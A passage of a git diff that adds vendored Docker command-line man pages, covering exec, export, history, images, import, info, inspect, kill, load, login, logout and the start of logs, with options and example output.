This option allows you to specify arbitrary environment variables that are +available for the command to be executed. + +**--help** + Print usage statement + +**-i**, **--interactive**=*true*|*false* + Keep STDIN open even if not attached. The default is *false*. + +**--privileged**=*true*|*false* + Give the process extended [Linux capabilities](http://man7.org/linux/man-pages/man7/capabilities.7.html) +when running in a container. The default is *false*. + + Without this flag, the process run by `docker exec` in a running container has +the same capabilities as the container, which may be limited. Set +`--privileged` to give all capabilities to the process. + +**-t**, **--tty**=*true*|*false* + Allocate a pseudo-TTY. The default is *false*. + +**-u**, **--user**="" + Sets the username or UID used and optionally the groupname or GID for the specified command. + + The followings examples are all valid: + --user [user | user:group | uid | uid:gid | user:gid | uid:group ] + + Without this argument the command will be run as root in the container. + +The **-t** option is incompatible with a redirection of the docker client +standard input. + +# HISTORY +November 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-export.1.md b/vendor/github.com/docker/docker/man/docker-export.1.md new file mode 100644 index 0000000000..3d59e4788e --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-export.1.md @@ -0,0 +1,46 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-export - Export the contents of a container's filesystem as a tar archive + +# SYNOPSIS +**docker export** +[**--help**] +[**-o**|**--output**[=*""*]] +CONTAINER + +# DESCRIPTION +Export the contents of a container's filesystem using the full or shortened +container ID or container name. The output is exported to STDOUT and can be +redirected to a tar file. + +Stream to a file instead of STDOUT by using **-o**. + +# OPTIONS +**--help** + Print usage statement + +**-o**, **--output**="" + Write to a file, instead of STDOUT + +# EXAMPLES +Export the contents of the container called angry_bell to a tar file +called angry_bell.tar: + + # docker export angry_bell > angry_bell.tar + # docker export --output=angry_bell-latest.tar angry_bell + # ls -sh angry_bell.tar + 321M angry_bell.tar + # ls -sh angry_bell-latest.tar + 321M angry_bell-latest.tar + +# See also +**docker-import(1)** to create an empty filesystem image +and import the contents of the tarball into it, then optionally tag it. + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +January 2015, updated by Joseph Kern (josephakern at gmail dot com) diff --git a/vendor/github.com/docker/docker/man/docker-history.1.md b/vendor/github.com/docker/docker/man/docker-history.1.md new file mode 100644 index 0000000000..91edefe25f --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-history.1.md @@ -0,0 +1,52 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-history - Show the history of an image + +# SYNOPSIS +**docker history** +[**--help**] +[**-H**|**--human**[=*true*]] +[**--no-trunc**] +[**-q**|**--quiet**] +IMAGE + +# DESCRIPTION + +Show the history of when and how an image was created. + +# OPTIONS +**--help** + Print usage statement + +**-H**, **--human**=*true*|*false* + Print sizes and dates in human readable format. The default is *true*. + +**--no-trunc**=*true*|*false* + Don't truncate output. The default is *false*. + +**-q**, **--quiet**=*true*|*false* + Only show numeric IDs. The default is *false*. + +# EXAMPLES + $ docker history fedora + IMAGE CREATED CREATED BY SIZE COMMENT + 105182bb5e8b 5 days ago /bin/sh -c #(nop) ADD file:71356d2ad59aa3119d 372.7 MB + 73bd853d2ea5 13 days ago /bin/sh -c #(nop) MAINTAINER Lokesh Mandvekar 0 B + 511136ea3c5a 10 months ago 0 B Imported from - + +## Display comments in the image history +The `docker commit` command has a **-m** flag for adding comments to the image. These comments will be displayed in the image history. + + $ sudo docker history docker:scm + IMAGE CREATED CREATED BY SIZE COMMENT + 2ac9d1098bf1 3 months ago /bin/bash 241.4 MB Added Apache to Fedora base image + 88b42ffd1f7c 5 months ago /bin/sh -c #(nop) ADD file:1fd8d7f9f6557cafc7 373.7 MB + c69cab00d6ef 5 months ago /bin/sh -c #(nop) MAINTAINER Lokesh Mandvekar 0 B + 511136ea3c5a 19 months ago 0 B Imported from - + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-images.1.md b/vendor/github.com/docker/docker/man/docker-images.1.md new file mode 100644 index 0000000000..d7958d0dc4 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-images.1.md @@ -0,0 +1,153 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-images - List images + +# SYNOPSIS +**docker images** +[**--help**] +[**-a**|**--all**] +[**--digests**] +[**-f**|**--filter**[=*[]*]] +[**--format**=*"TEMPLATE"*] +[**--no-trunc**] +[**-q**|**--quiet**] +[REPOSITORY[:TAG]] + +# DESCRIPTION +This command lists the images stored in the local Docker repository. + +By default, intermediate images, used during builds, are not listed. Some of the +output, e.g., image ID, is truncated, for space reasons. However the truncated +image ID, and often the first few characters, are enough to be used in other +Docker commands that use the image ID. The output includes repository, tag, image +ID, date created and the virtual size. + +The title REPOSITORY for the first title may seem confusing. It is essentially +the image name. However, because you can tag a specific image, and multiple tags +(image instances) can be associated with a single name, the name is really a +repository for all tagged images of the same name. For example consider an image +called fedora. It may be tagged with 18, 19, or 20, etc. to manage different +versions. + +# OPTIONS +**-a**, **--all**=*true*|*false* + Show all images (by default filter out the intermediate image layers). The default is *false*. + +**--digests**=*true*|*false* + Show image digests. The default is *false*. + +**-f**, **--filter**=[] + Filters the output based on these conditions: + - dangling=(true|false) - find unused images + - label= or label== + - before=([:tag]||) + - since=([:tag]||) + +**--format**="*TEMPLATE*" + Pretty-print images using a Go template. + Valid placeholders: + .ID - Image ID + .Repository - Image repository + .Tag - Image tag + .Digest - Image digest + .CreatedSince - Elapsed time since the image was created + .CreatedAt - Time when the image was created + .Size - Image disk size + +**--help** + Print usage statement + +**--no-trunc**=*true*|*false* + Don't truncate output. The default is *false*. + +**-q**, **--quiet**=*true*|*false* + Only show numeric IDs. The default is *false*. + +# EXAMPLES + +## Listing the images + +To list the images in a local repository (not the registry) run: + + docker images + +The list will contain the image repository name, a tag for the image, and an +image ID, when it was created and its virtual size. Columns: REPOSITORY, TAG, +IMAGE ID, CREATED, and SIZE. + +The `docker images` command takes an optional `[REPOSITORY[:TAG]]` argument +that restricts the list to images that match the argument. If you specify +`REPOSITORY`but no `TAG`, the `docker images` command lists all images in the +given repository. + + docker images java + +The `[REPOSITORY[:TAG]]` value must be an "exact match". This means that, for example, +`docker images jav` does not match the image `java`. + +If both `REPOSITORY` and `TAG` are provided, only images matching that +repository and tag are listed. To find all local images in the "java" +repository with tag "8" you can use: + + docker images java:8 + +To get a verbose list of images which contains all the intermediate images +used in builds use **-a**: + + docker images -a + +Previously, the docker images command supported the --tree and --dot arguments, +which displayed different visualizations of the image data. Docker core removed +this functionality in the 1.7 version. If you liked this functionality, you can +still find it in the third-party dockviz tool: https://github.com/justone/dockviz. + +## Listing images in a desired format + +When using the --format option, the image command will either output the data +exactly as the template declares or, when using the `table` directive, will +include column headers as well. You can use special characters like `\t` for +inserting tab spacing between columns. + +The following example uses a template without headers and outputs the ID and +Repository entries separated by a colon for all images: + + docker images --format "{{.ID}}: {{.Repository}}" + 77af4d6b9913: + b6fa739cedf5: committ + 78a85c484bad: ipbabble + 30557a29d5ab: docker + 5ed6274db6ce: + 746b819f315e: postgres + 746b819f315e: postgres + 746b819f315e: postgres + 746b819f315e: postgres + +To list all images with their repository and tag in a table format you can use: + + docker images --format "table {{.ID}}\t{{.Repository}}\t{{.Tag}}" + IMAGE ID REPOSITORY TAG + 77af4d6b9913 + b6fa739cedf5 committ latest + 78a85c484bad ipbabble + 30557a29d5ab docker latest + 5ed6274db6ce + 746b819f315e postgres 9 + 746b819f315e postgres 9.3 + 746b819f315e postgres 9.3.5 + 746b819f315e postgres latest + +Valid template placeholders are listed above. + +## Listing only the shortened image IDs + +Listing just the shortened image IDs. This can be useful for some automated +tools. + + docker images -q + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-import.1.md b/vendor/github.com/docker/docker/man/docker-import.1.md new file mode 100644 index 0000000000..43d65efe6a --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-import.1.md @@ -0,0 +1,72 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-import - Create an empty filesystem image and import the contents of the tarball (.tar, .tar.gz, .tgz, .bzip, .tar.xz, .txz) into it, then optionally tag it. + +# SYNOPSIS +**docker import** +[**-c**|**--change**[=*[]*]] +[**-m**|**--message**[=*MESSAGE*]] +[**--help**] +file|URL|**-**[REPOSITORY[:TAG]] + +# OPTIONS +**-c**, **--change**=[] + Apply specified Dockerfile instructions while importing the image + Supported Dockerfile instructions: `CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR` + +**--help** + Print usage statement + +**-m**, **--message**="" + Set commit message for imported image + +# DESCRIPTION +Create a new filesystem image from the contents of a tarball (`.tar`, +`.tar.gz`, `.tgz`, `.bzip`, `.tar.xz`, `.txz`) into it, then optionally tag it. + + +# EXAMPLES + +## Import from a remote location + + # docker import http://example.com/exampleimage.tgz example/imagerepo + +## Import from a local file + +Import to docker via pipe and stdin: + + # cat exampleimage.tgz | docker import - example/imagelocal + +Import with a commit message. + + # cat exampleimage.tgz | docker import --message "New image imported from tarball" - exampleimagelocal:new + +Import to a Docker image from a local file. + + # docker import /path/to/exampleimage.tgz + + +## Import from a local file and tag + +Import to docker via pipe and stdin: + + # cat exampleimageV2.tgz | docker import - example/imagelocal:V-2.0 + +## Import from a local directory + + # tar -c . | docker import - exampleimagedir + +## Apply specified Dockerfile instructions while importing the image +This example sets the docker image ENV variable DEBUG to true by default. + + # tar -c . | docker import -c="ENV DEBUG true" - exampleimagedir + +# See also +**docker-export(1)** to export the contents of a filesystem as a tar archive to STDOUT. + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-info.1.md b/vendor/github.com/docker/docker/man/docker-info.1.md new file mode 100644 index 0000000000..bb7a8fb4c2 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-info.1.md @@ -0,0 +1,187 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-info - Display system-wide information + +# SYNOPSIS +**docker info** +[**--help**] +[**-f**|**--format**[=*FORMAT*]] + +# DESCRIPTION +This command displays system wide information regarding the Docker installation. +Information displayed includes the kernel version, number of containers and images. +The number of images shown is the number of unique images. The same image tagged +under different names is counted only once. + +If a format is specified, the given template will be executed instead of the +default format. Go's **text/template** package +describes all the details of the format. + +Depending on the storage driver in use, additional information can be shown, such +as pool name, data file, metadata file, data space used, total data space, metadata +space used, and total metadata space. + +The data file is where the images are stored and the metadata file is where the +meta data regarding those images are stored. When run for the first time Docker +allocates a certain amount of data space and meta data space from the space +available on the volume where `/var/lib/docker` is mounted. + +# OPTIONS +**--help** + Print usage statement + +**-f**, **--format**="" + Format the output using the given Go template + +# EXAMPLES + +## Display Docker system information + +Here is a sample output for a daemon running on Ubuntu, using the overlay2 +storage driver: + + $ docker -D info + Containers: 14 + Running: 3 + Paused: 1 + Stopped: 10 + Images: 52 + Server Version: 1.13.0 + Storage Driver: overlay2 + Backing Filesystem: extfs + Supports d_type: true + Native Overlay Diff: false + Logging Driver: json-file + Cgroup Driver: cgroupfs + Plugins: + Volume: local + Network: bridge host macvlan null overlay + Swarm: active + NodeID: rdjq45w1op418waxlairloqbm + Is Manager: true + ClusterID: te8kdyw33n36fqiz74bfjeixd + Managers: 1 + Nodes: 2 + Orchestration: + Task History Retention Limit: 5 + Raft: + Snapshot Interval: 10000 + Number of Old Snapshots to Retain: 0 + Heartbeat Tick: 1 + Election Tick: 3 + Dispatcher: + Heartbeat Period: 5 seconds + CA Configuration: + Expiry Duration: 3 months + Node Address: 172.16.66.128 172.16.66.129 + Manager Addresses: + 172.16.66.128:2477 + Runtimes: runc + Default Runtime: runc + Init Binary: docker-init + containerd version: 8517738ba4b82aff5662c97ca4627e7e4d03b531 + runc version: ac031b5bf1cc92239461125f4c1ffb760522bbf2 + init version: N/A (expected: v0.13.0) + Security Options: + apparmor + seccomp + Profile: default + Kernel Version: 4.4.0-31-generic + Operating System: Ubuntu 16.04.1 LTS + OSType: linux + Architecture: x86_64 + CPUs: 2 + Total Memory: 1.937 GiB + Name: ubuntu + ID: H52R:7ZR6:EIIA:76JG:ORIY:BVKF:GSFU:HNPG:B5MK:APSC:SZ3Q:N326 + Docker Root Dir: /var/lib/docker + Debug Mode (client): true + Debug Mode (server): true + File Descriptors: 30 + Goroutines: 123 + System Time: 2016-11-12T17:24:37.955404361-08:00 + EventsListeners: 0 + Http Proxy: http://test:test@proxy.example.com:8080 + Https Proxy: https://test:test@proxy.example.com:8080 + No Proxy: localhost,127.0.0.1,docker-registry.somecorporation.com + Registry: https://index.docker.io/v1/ + WARNING: No swap limit support + Labels: + storage=ssd + staging=true + Experimental: false + Insecure Registries: + 127.0.0.0/8 + Registry Mirrors: + http://192.168.1.2/ + http://registry-mirror.example.com:5000/ + Live Restore Enabled: false + + + +The global `-D` option tells all `docker` commands to output debug information. + +The example below shows the output for a daemon running on Red Hat Enterprise Linux, +using the devicemapper storage driver. As can be seen in the output, additional +information about the devicemapper storage driver is shown: + + $ docker info + Containers: 14 + Running: 3 + Paused: 1 + Stopped: 10 + Untagged Images: 52 + Server Version: 1.10.3 + Storage Driver: devicemapper + Pool Name: docker-202:2-25583803-pool + Pool Blocksize: 65.54 kB + Base Device Size: 10.74 GB + Backing Filesystem: xfs + Data file: /dev/loop0 + Metadata file: /dev/loop1 + Data Space Used: 1.68 GB + Data Space Total: 107.4 GB + Data Space Available: 7.548 GB + Metadata Space Used: 2.322 MB + Metadata Space Total: 2.147 GB + Metadata Space Available: 2.145 GB + Udev Sync Supported: true + Deferred Removal Enabled: false + Deferred Deletion Enabled: false + Deferred Deleted Device Count: 0 + Data loop file: /var/lib/docker/devicemapper/devicemapper/data + Metadata loop file: /var/lib/docker/devicemapper/devicemapper/metadata + Library Version: 1.02.107-RHEL7 (2015-12-01) + Execution Driver: native-0.2 + Logging Driver: json-file + Plugins: + Volume: local + Network: null host bridge + Kernel Version: 3.10.0-327.el7.x86_64 + Operating System: Red Hat Enterprise Linux Server 7.2 (Maipo) + OSType: linux + Architecture: x86_64 + CPUs: 1 + Total Memory: 991.7 MiB + Name: ip-172-30-0-91.ec2.internal + ID: I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S + Docker Root Dir: /var/lib/docker + Debug mode (client): false + Debug mode (server): false + Username: gordontheturtle + Registry: https://index.docker.io/v1/ + Insecure registries: + myinsecurehost:5000 + 127.0.0.0/8 + +You can also specify the output format: + + $ docker info --format '{{json .}}' + {"ID":"I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S","Containers":14, ...} + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-inspect.1.md b/vendor/github.com/docker/docker/man/docker-inspect.1.md new file mode 100644 index 0000000000..21d7ba678a --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-inspect.1.md @@ -0,0 +1,323 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-inspect - Return low-level information on docker objects + +# SYNOPSIS +**docker inspect** +[**--help**] +[**-f**|**--format**[=*FORMAT*]] +[**-s**|**--size**] +[**--type**=*container*|*image*|*network*|*node*|*service*|*task*|*volume*] +NAME|ID [NAME|ID...] + +# DESCRIPTION + +This displays the low-level information on Docker object(s) (e.g. container, +image, volume,network, node, service, or task) identified by name or ID. By default, +this will render all results in a JSON array. If the container and image have +the same name, this will return container JSON for unspecified type. If a format +is specified, the given template will be executed for each result. + +# OPTIONS +**--help** + Print usage statement + +**-f**, **--format**="" + Format the output using the given Go template + +**-s**, **--size** + Display total file sizes if the type is container + +**--type**=*container*|*image*|*network*|*node*|*service*|*task*|*volume* + Return JSON for specified type, permissible values are "image", "container", + "network", "node", "service", "task", and "volume" + +# EXAMPLES + +Get information about an image when image name conflicts with the container name, +e.g. both image and container are named rhel7: + + $ docker inspect --type=image rhel7 + [ + { + "Id": "fe01a428b9d9de35d29531e9994157978e8c48fa693e1bf1d221dffbbb67b170", + "Parent": "10acc31def5d6f249b548e01e8ffbaccfd61af0240c17315a7ad393d022c5ca2", + .... + } + ] + +## Getting information on a container + +To get information on a container use its ID or instance name: + + $ docker inspect d2cc496561d6 + [{ + "Id": "d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47", + "Created": "2015-06-08T16:18:02.505155285Z", + "Path": "bash", + "Args": [], + "State": { + "Running": false, + "Paused": false, + "Restarting": false, + "OOMKilled": false, + "Dead": false, + "Pid": 0, + "ExitCode": 0, + "Error": "", + "StartedAt": "2015-06-08T16:18:03.643865954Z", + "FinishedAt": "2015-06-08T16:57:06.448552862Z" + }, + "Image": "ded7cd95e059788f2586a51c275a4f151653779d6a7f4dad77c2bd34601d94e4", + "NetworkSettings": { + "Bridge": "", + "SandboxID": "6b4851d1903e16dd6a567bd526553a86664361f31036eaaa2f8454d6f4611f6f", + "HairpinMode": false, + "LinkLocalIPv6Address": "", + "LinkLocalIPv6PrefixLen": 0, + "Ports": {}, + "SandboxKey": "/var/run/docker/netns/6b4851d1903e", + "SecondaryIPAddresses": null, + "SecondaryIPv6Addresses": null, + "EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d", + "Gateway": "172.17.0.1", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "IPAddress": "172.17.0.2", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "MacAddress": "02:42:ac:12:00:02", + "Networks": { + "bridge": { + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.2", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:12:00:02" + } + } + + }, + "ResolvConfPath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/resolv.conf", + "HostnamePath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/hostname", + "HostsPath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/hosts", + "LogPath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47-json.log", + "Name": "/adoring_wozniak", + "RestartCount": 0, + "Driver": "devicemapper", + "MountLabel": "", + "ProcessLabel": "", + "Mounts": [ + { + "Source": "/data", + "Destination": "/data", + "Mode": "ro,Z", + "RW": false + "Propagation": "" + } + ], + "AppArmorProfile": "", + "ExecIDs": null, + "HostConfig": { + "Binds": null, + "ContainerIDFile": "", + "Memory": 0, + "MemorySwap": 0, + "CpuShares": 0, + "CpuPeriod": 0, + "CpusetCpus": "", + "CpusetMems": "", + "CpuQuota": 0, + "BlkioWeight": 0, + "OomKillDisable": false, + "Privileged": false, + "PortBindings": {}, + "Links": null, + "PublishAllPorts": false, + "Dns": null, + "DnsSearch": null, + "DnsOptions": null, + "ExtraHosts": null, + "VolumesFrom": null, + "Devices": [], + "NetworkMode": "bridge", + "IpcMode": "", + "PidMode": "", + "UTSMode": "", + "CapAdd": null, + "CapDrop": null, + "RestartPolicy": { + "Name": "no", + "MaximumRetryCount": 0 + }, + "SecurityOpt": null, + "ReadonlyRootfs": false, + "Ulimits": null, + "LogConfig": { + "Type": "json-file", + "Config": {} + }, + "CgroupParent": "" + }, + "GraphDriver": { + "Name": "devicemapper", + "Data": { + "DeviceId": "5", + "DeviceName": "docker-253:1-2763198-d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47", + "DeviceSize": "171798691840" + } + }, + "Config": { + "Hostname": "d2cc496561d6", + "Domainname": "", + "User": "", + "AttachStdin": true, + "AttachStdout": true, + "AttachStderr": true, + "ExposedPorts": null, + "Tty": true, + "OpenStdin": true, + "StdinOnce": true, + "Env": null, + "Cmd": [ + "bash" + ], + "Image": "fedora", + "Volumes": null, + "VolumeDriver": "", + "WorkingDir": "", + "Entrypoint": null, + "NetworkDisabled": false, + "MacAddress": "", + "OnBuild": null, + "Labels": {}, + "Memory": 0, + "MemorySwap": 0, + "CpuShares": 0, + "Cpuset": "", + "StopSignal": "SIGTERM" + } + } + ] +## Getting the IP address of a container instance + +To get the IP address of a container use: + + $ docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' d2cc496561d6 + 172.17.0.2 + +## Listing all port bindings + +One can loop over arrays and maps in the results to produce simple text +output: + + $ docker inspect --format='{{range $p, $conf := .NetworkSettings.Ports}} \ + {{$p}} -> {{(index $conf 0).HostPort}} {{end}}' d2cc496561d6 + 80/tcp -> 80 + +You can get more information about how to write a Go template from: +https://golang.org/pkg/text/template/. + +## Getting size information on a container + + $ docker inspect -s d2cc496561d6 + [ + { + .... + "SizeRw": 0, + "SizeRootFs": 972, + .... + } + ] + +## Getting information on an image + +Use an image's ID or name (e.g., repository/name[:tag]) to get information +about the image: + + $ docker inspect ded7cd95e059 + [{ + "Id": "ded7cd95e059788f2586a51c275a4f151653779d6a7f4dad77c2bd34601d94e4", + "Parent": "48ecf305d2cf7046c1f5f8fcbcd4994403173441d4a7f125b1bb0ceead9de731", + "Comment": "", + "Created": "2015-05-27T16:58:22.937503085Z", + "Container": "76cf7f67d83a7a047454b33007d03e32a8f474ad332c3a03c94537edd22b312b", + "ContainerConfig": { + "Hostname": "76cf7f67d83a", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": false, + "AttachStderr": false, + "ExposedPorts": null, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": [ + "/bin/sh", + "-c", + "#(nop) ADD file:4be46382bcf2b095fcb9fe8334206b584eff60bb3fad8178cbd97697fcb2ea83 in /" + ], + "Image": "48ecf305d2cf7046c1f5f8fcbcd4994403173441d4a7f125b1bb0ceead9de731", + "Volumes": null, + "VolumeDriver": "", + "WorkingDir": "", + "Entrypoint": null, + "NetworkDisabled": false, + "MacAddress": "", + "OnBuild": null, + "Labels": {} + }, + "DockerVersion": "1.6.0", + "Author": "Lokesh Mandvekar \u003clsm5@fedoraproject.org\u003e", + "Config": { + "Hostname": "76cf7f67d83a", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": false, + "AttachStderr": false, + "ExposedPorts": null, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": null, + "Image": "48ecf305d2cf7046c1f5f8fcbcd4994403173441d4a7f125b1bb0ceead9de731", + "Volumes": null, + "VolumeDriver": "", + "WorkingDir": "", + "Entrypoint": null, + "NetworkDisabled": false, + "MacAddress": "", + "OnBuild": null, + "Labels": {} + }, + "Architecture": "amd64", + "Os": "linux", + "Size": 186507296, + "VirtualSize": 186507296, + "GraphDriver": { + "Name": "devicemapper", + "Data": { + "DeviceId": "3", + "DeviceName": "docker-253:1-2763198-ded7cd95e059788f2586a51c275a4f151653779d6a7f4dad77c2bd34601d94e4", + "DeviceSize": "171798691840" + } + } + } + ] + +# HISTORY +April 2014, originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +April 2015, updated by Qiang Huang +October 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-kill.1.md b/vendor/github.com/docker/docker/man/docker-kill.1.md new file mode 100644 index 0000000000..36cbdb90ea --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-kill.1.md @@ -0,0 +1,28 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-kill - Kill a running container using SIGKILL or a specified signal + +# SYNOPSIS +**docker kill** +[**--help**] +[**-s**|**--signal**[=*"KILL"*]] +CONTAINER [CONTAINER...] + +# DESCRIPTION + +The main process inside each container specified will be sent SIGKILL, + or any signal specified with option --signal. + +# OPTIONS +**--help** + Print usage statement + +**-s**, **--signal**="*KILL*" + Signal to send to the container + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) + based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-load.1.md b/vendor/github.com/docker/docker/man/docker-load.1.md new file mode 100644 index 0000000000..b165173047 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-load.1.md @@ -0,0 +1,56 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-load - Load an image from a tar archive or STDIN + +# SYNOPSIS +**docker load** +[**--help**] +[**-i**|**--input**[=*INPUT*]] +[**-q**|**--quiet**] + +# DESCRIPTION + +Loads a tarred repository from a file or the standard input stream. +Restores both images and tags. Write image names or IDs imported it +standard output stream. + +# OPTIONS +**--help** + Print usage statement + +**-i**, **--input**="" + Read from a tar archive file, instead of STDIN. The tarball may be compressed with gzip, bzip, or xz. + +**-q**, **--quiet** + Suppress the load progress bar but still outputs the imported images. + +# EXAMPLES + + $ docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + busybox latest 769b9341d937 7 weeks ago 2.489 MB + $ docker load --input fedora.tar + # […] + Loaded image: fedora:rawhide + # […] + Loaded image: fedora:20 + # […] + $ docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + busybox latest 769b9341d937 7 weeks ago 2.489 MB + fedora rawhide 0d20aec6529d 7 weeks ago 387 MB + fedora 20 58394af37342 7 weeks ago 385.5 MB + fedora heisenbug 58394af37342 7 weeks ago 385.5 MB + fedora latest 58394af37342 7 weeks ago 385.5 MB + +# See also +**docker-save(1)** to save one or more images to a tar archive (streamed to STDOUT by default). + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +July 2015 update by Mary Anthony +June 2016 update by Vincent Demeester diff --git a/vendor/github.com/docker/docker/man/docker-login.1.md b/vendor/github.com/docker/docker/man/docker-login.1.md new file mode 100644 index 0000000000..c0d4f795db --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-login.1.md @@ -0,0 +1,53 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-login - Log in to a Docker registry. + +# SYNOPSIS +**docker login** +[**--help**] +[**-p**|**--password**[=*PASSWORD*]] +[**-u**|**--username**[=*USERNAME*]] +[SERVER] + +# DESCRIPTION +Log in to a Docker Registry located on the specified +`SERVER`. You can specify a URL or a `hostname` for the `SERVER` value. If you +do not specify a `SERVER`, the command uses Docker's public registry located at +`https://registry-1.docker.io/` by default. To get a username/password for Docker's public registry, create an account on Docker Hub. + +`docker login` requires user to use `sudo` or be `root`, except when: + +1. connecting to a remote daemon, such as a `docker-machine` provisioned `docker engine`. +2. user is added to the `docker` group. This will impact the security of your system; the `docker` group is `root` equivalent. See [Docker Daemon Attack Surface](https://docs.docker.com/engine/articles/security/#docker-daemon-attack-surface) for details. + +You can log into any public or private repository for which you have +credentials. When you log in, the command stores encoded credentials in +`$HOME/.docker/config.json` on Linux or `%USERPROFILE%/.docker/config.json` on Windows. + +# OPTIONS +**--help** + Print usage statement + +**-p**, **--password**="" + Password + +**-u**, **--username**="" + Username + +# EXAMPLES + +## Login to a registry on your localhost + + # docker login localhost:8080 + +# See also +**docker-logout(1)** to log out from a Docker registry. + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +April 2015, updated by Mary Anthony for v2 +November 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-logout.1.md b/vendor/github.com/docker/docker/man/docker-logout.1.md new file mode 100644 index 0000000000..a8a4b7c3c0 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-logout.1.md @@ -0,0 +1,32 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-logout - Log out from a Docker registry. + +# SYNOPSIS +**docker logout** +[SERVER] + +# DESCRIPTION +Log out of a Docker Registry located on the specified `SERVER`. You can +specify a URL or a `hostname` for the `SERVER` value. If you do not specify a +`SERVER`, the command attempts to log you out of Docker's public registry +located at `https://registry-1.docker.io/` by default. + +# OPTIONS +There are no available options. + +# EXAMPLES + +## Log out from a registry on your localhost + + # docker logout localhost:8080 + +# See also +**docker-login(1)** to log in to a Docker registry server. + +# HISTORY +June 2014, Originally compiled by Daniel, Dao Quang Minh (daniel at nitrous dot io) +July 2014, updated by Sven Dowideit +April 2015, updated by Mary Anthony for v2 diff --git a/vendor/github.com/docker/docker/man/docker-logs.1.md b/vendor/github.com/docker/docker/man/docker-logs.1.md new file mode 100644 index 0000000000..e70f796e28 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-logs.1.md @@ -0,0 +1,71 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-logs - Fetch the logs of a container + +# SYNOPSIS +**docker logs** +[**-f**|**--follow**] +[**--help**] 